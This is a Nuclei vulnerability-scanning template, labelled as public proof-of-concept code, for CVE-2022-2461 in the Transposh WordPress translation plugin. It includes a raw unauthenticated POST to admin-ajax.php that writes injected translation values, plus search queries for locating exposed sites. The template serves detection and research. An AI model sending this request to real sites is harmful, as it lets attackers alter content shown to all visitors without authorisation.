The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
PoC代码[已公开]
id: CVE-2022-2461
info:
name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
author: riteshs4hu
severity: medium
description: |
The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
impact: |
Unauthenticated attackers can modify plugin settings through the tp_translation AJAX endpoint without authentication, potentially manipulating translated content and injecting malicious data that affects all site visitors.
remediation: |
Update Transposh WordPress Translation plugin to a version newer than 1.0.8.1 that implements proper authentication checks on AJAX actions.
reference:
- https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
- https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
- https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-2461
cwe-id: CWE-862
epss-score: 0.13263
epss-percentile: 0.93955
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln
variables:
redirect_uri: "oast.me"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}
matchers:
- type: dsl
dsl:
- "contains(body, '200 - backup in sync')"
- "contains(content_type, 'text/html')"
- "status_code == 200"
condition: and
extractors:
- type: regex
part: header
regex:
- "Transposh: v-[0-9.]+"
# digest: 490a0046304402201d12bb2dac1b4faecfef9a22376a197e1d49f52e1f30f11a8d7f8e83bdef2c9b02202f5ad8c37c3d2019708214ac3f241332a320408be9cf94aaa71a5078f1e04699:922c64590222798bb761d5b6d8e72950